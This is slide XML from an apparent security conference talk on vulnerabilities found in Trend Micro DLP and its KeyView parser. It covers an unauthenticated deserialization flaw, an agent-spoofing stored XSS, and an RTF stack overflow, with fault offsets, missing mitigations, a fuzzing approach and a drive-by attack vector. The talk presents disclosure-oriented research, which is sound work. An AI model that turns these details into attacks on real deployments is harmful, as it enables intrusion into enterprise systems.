          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>communication (encrypted)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p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Custom protocol format for the DLP client agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client-side uses KeyView, a third party component.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KeyView parses approximately 200 file formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>KeyView runs as SYSTEM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28" y="1772816"/>
            <a:ext cx="3960440" cy="174840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2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1628800"/>
            <a:ext cx="3312368" cy="2208246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vulnerabilities in this product?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Statistics (DLP + KeyView):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x vulnerabilities that lead to Remote Code Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x triggerable without authentication and privileged</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x Authentication bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x DoS (Denial of Service)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let’s discuss approach and the most interesting vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dlpCrawlerServerInvoker Deserialization of Untrusted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Unauthenticated Stored Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>KeyView RTF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fonttbl Tag Parsing Stack Buffer Overflow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892" y="1905000"/>
            <a:ext cx="9144000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extraction of web </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>related files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>home/dgate/prod/manager/webapps/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dsc/WEB-INF/classes/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>home/dgate/prod/manager/webapps/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dsc/WEB-INF/lib/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Decompile all classes and libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JAD / JD-Gui to decompile all classes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Manually reviewing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use of an IDE to map the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28" y="1772816"/>
            <a:ext cx="4320480" cy="1566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446" y="3573016"/>
            <a:ext cx="1867190" cy="1504899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444870"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6271542" y="5229200"/>
          <a:ext cx="3279254" cy="1418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" name="Bitmap Image" r:id="rId6" imgW="4686480" imgH="2026800" progId="Paint.Picture">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId6" imgW="4686480" imgH="2026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1542" y="5229200"/>
                        <a:ext cx="3279254" cy="1418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828" y="1905000"/>
            <a:ext cx="9144000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mapping attack surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identify different type of client software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Noticed the Crawler agent software available</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Agent software is a separate package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mapping use of third parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Noticed use of keyview (more on this later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mapping all external ports to processes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1772816"/>
            <a:ext cx="4680520" cy="4258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794" y="5356636"/>
            <a:ext cx="5067300" cy="11525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dlpCrawlerServerInvoker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deserialization of Untrusted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The bug lies in the way the DLP Crawler agent works and communicates to the DLP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The DLP Crawler agents uses a specific port to pass data to the DLP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Port 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The protocol used is HTTP with Java serialized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1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dlpCrawlerServerInvoker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deserialization of Untrusted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091" y="1844824"/>
            <a:ext cx="10332642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 of communication between the DLP Crawler agent and DLP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9" t="-3557" r="-619" b="9594"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917948" y="2348880"/>
            <a:ext cx="8585626" cy="39631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Steven Seeley (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@mr_me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AWAE Content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offensive Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Independent Security Researcher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Incite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focusing on high end desktop, enterprise and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SCADA vulnerability discovery and exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Studies the CRCA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chun Martial Arts system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Certified Scuba Diver and Personal Trainer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://srcincite.io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04" y="1772815"/>
            <a:ext cx="2696600" cy="2696600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dlpCrawlerServerInvoker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deserialization of Untrusted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looking at the HTTP POST request we notice important elements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lack of authentication mechanism </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No challenge/nonce token required by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The communication is in clear-text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presence of Java-to-Java remoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java serialized objects are passed within the HTTP POST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dlpCrawlerServerInvoker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deserialization of Untrusted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860" y="1905000"/>
            <a:ext cx="10513168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dsc/invoker/dlpCrawlerServerInvoker is handled by the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code in com/dgatetech/common/crawler/sigagent/RemoteCrawlerAgent.java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38" b="3511"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053852" y="2787824"/>
            <a:ext cx="10081120" cy="33843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dlpCrawlerServerInvoker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deserialization of Untrusted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844824"/>
            <a:ext cx="11331824" cy="337906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4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Unauthenticated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored Cross Site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Encrypted communication defeated using API Monitor against bcrypt.dll and ncrypt.dll libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lack of authentication between agent and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lack of input validation and output escaping on the DLP portal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker simulates a registering agent with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an arbitrary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in its "computername"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XSS payload is stored and rendered in two areas of the DLP administrative interface:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/dsc/pages/administration/endpointmanagement/endpointsPortal.do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dsc/pages/dataProtection/accessControl/preListAccessControl.do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0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Unauthenticated Stored Cross Site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59" y="1772816"/>
            <a:ext cx="6867525" cy="2952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9" y="3483328"/>
            <a:ext cx="44958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59" y="4733518"/>
            <a:ext cx="5688632" cy="212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89" y="2076290"/>
            <a:ext cx="4686300" cy="752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4489" y="2564904"/>
            <a:ext cx="951651" cy="263861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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646140" y="1949963"/>
            <a:ext cx="4032448" cy="614941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110636" y="2564904"/>
            <a:ext cx="1080120" cy="263861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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44608" y="2828765"/>
            <a:ext cx="2285631" cy="2028985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48359" y="5569171"/>
            <a:ext cx="5222517" cy="489189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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stCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2422004" y="3729417"/>
            <a:ext cx="2626355" cy="2066342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646140" y="4005064"/>
            <a:ext cx="1152128" cy="2812014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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Unauthenticated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored Cross Site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47" y="1772816"/>
            <a:ext cx="10231732" cy="42492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Unauthenticated Stored Cross Site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44" y="1772816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EndpointMgmtListAction.java, here, the epjsonArray.put() function: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getLinkedUrl() function builds the HTML code which will be embedded in JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>format: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68" y="4892457"/>
            <a:ext cx="6552728" cy="1536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036" y="2365623"/>
            <a:ext cx="8105775" cy="14954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Unauthenticated Stored Cross Site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was it discovered?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After analyzing and decrypting traffic between agent and server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By examining data following these principles:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can data be controlled?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is data changed by the application before rendering?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are there filters, size limits or any preventing condition?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is data rendered in an HTML context?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is data directly or indirectly rendered?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834340"/>
            <a:ext cx="4499744" cy="1564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884" y="1916832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KeyView is a third party component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used by many DLP solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developed by Autonomy – now owned by HPE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Its main role is to parse, index and convert files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Large support of file formats (more than 200)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DLP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Crawler Agent also uses KeyView component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C:\Program Files\Trend Micro\DLP Remote Crawler Agent\dll\kvfilter.dll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a way to easily interact with KeyView:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How do we know that filter.exe uses KeyView?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reverse engineered and spotted a dynamic DLL load of kvfilter.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analysis of kvfilter.dll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708" y="1905000"/>
            <a:ext cx="3168352" cy="1903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033" y="3380351"/>
            <a:ext cx="2388773" cy="324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14" y="3483290"/>
            <a:ext cx="3809419" cy="31683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474686" y="4038600"/>
            <a:ext cx="2949636" cy="213360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84464" y="5661248"/>
            <a:ext cx="644059" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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457" y="3978398"/>
            <a:ext cx="3693021" cy="26423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0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T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>his Presentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>is NOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>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Dropping the zero-day we found !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A debate on vulnerability disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Putting down Trend Micro.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many other vendors have just as many, if not more vulnerabilities in their code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>It’s about:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sharing our failures, successes, approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Helping other developers and security researchers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the fuzzing approach can be as the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command line: ”filter.exe &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>fuzzedfile&gt;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:\temp\junk.txt”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The junk.txt file will be created by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Obtain a valid corpus of sample files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ideally these are traced and reduced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It doesn't matter if we only obtain a few samples, the target code is old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do fuzz()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hile 1;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Hundreds of vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>discovered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focused only few </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>highly exploitable conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of which affect the latest version and are still zero-day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RTF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fonttbl Tag Parsing Stack Buffer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RTF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>parsing library (rtfsr.dll) vulnerable to stack buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caused due to incorrect placement of the { tag to close off one of the fonts within the font table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fault is in: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>rtfsr!rtfFillBuffer+0x8734 (loc_7CBC83)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function calls a strcpy() – this results in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an overflow of the stack frames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442"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6886500" y="3573016"/>
            <a:ext cx="4436462" cy="304050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RTF fonttbl Tag Parsing Stack Buffer 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Corrupted Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>frames suck when trying to perform a RCA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2492896"/>
            <a:ext cx="7605584" cy="33990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RTF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fonttbl Tag Parsing Stack Buffer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812" y="1905000"/>
            <a:ext cx="9144000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A crafted, embedded font allows instruction control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ideal situation for exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An attacker can modify a return address and take</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>control of the software code execution flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1990 called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" smtClean="0"/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88" y="1671081"/>
            <a:ext cx="3740440" cy="2339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66" y="4155445"/>
            <a:ext cx="6854044" cy="26581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265812" y="3717032"/>
            <a:ext cx="5554727" cy="2970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251566" y="6570179"/>
            <a:ext cx="741486" cy="233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RTF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fonttbl Tag Parsing Stack Buffer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Exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is made easier because the kvfilter.dll was not compiled with ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or SafeSEH support or Stack Cookies!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gadgets can be used to exit from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and then hit the controlled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Compromise the client and then target the server!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The vector can be a drive by download, such as Chrome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KeyView - RTF fonttbl Tag Parsing Stack Buffer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812" y="19050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We created a simple PoC that </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pops a calc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DLP policy is often set to scan </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
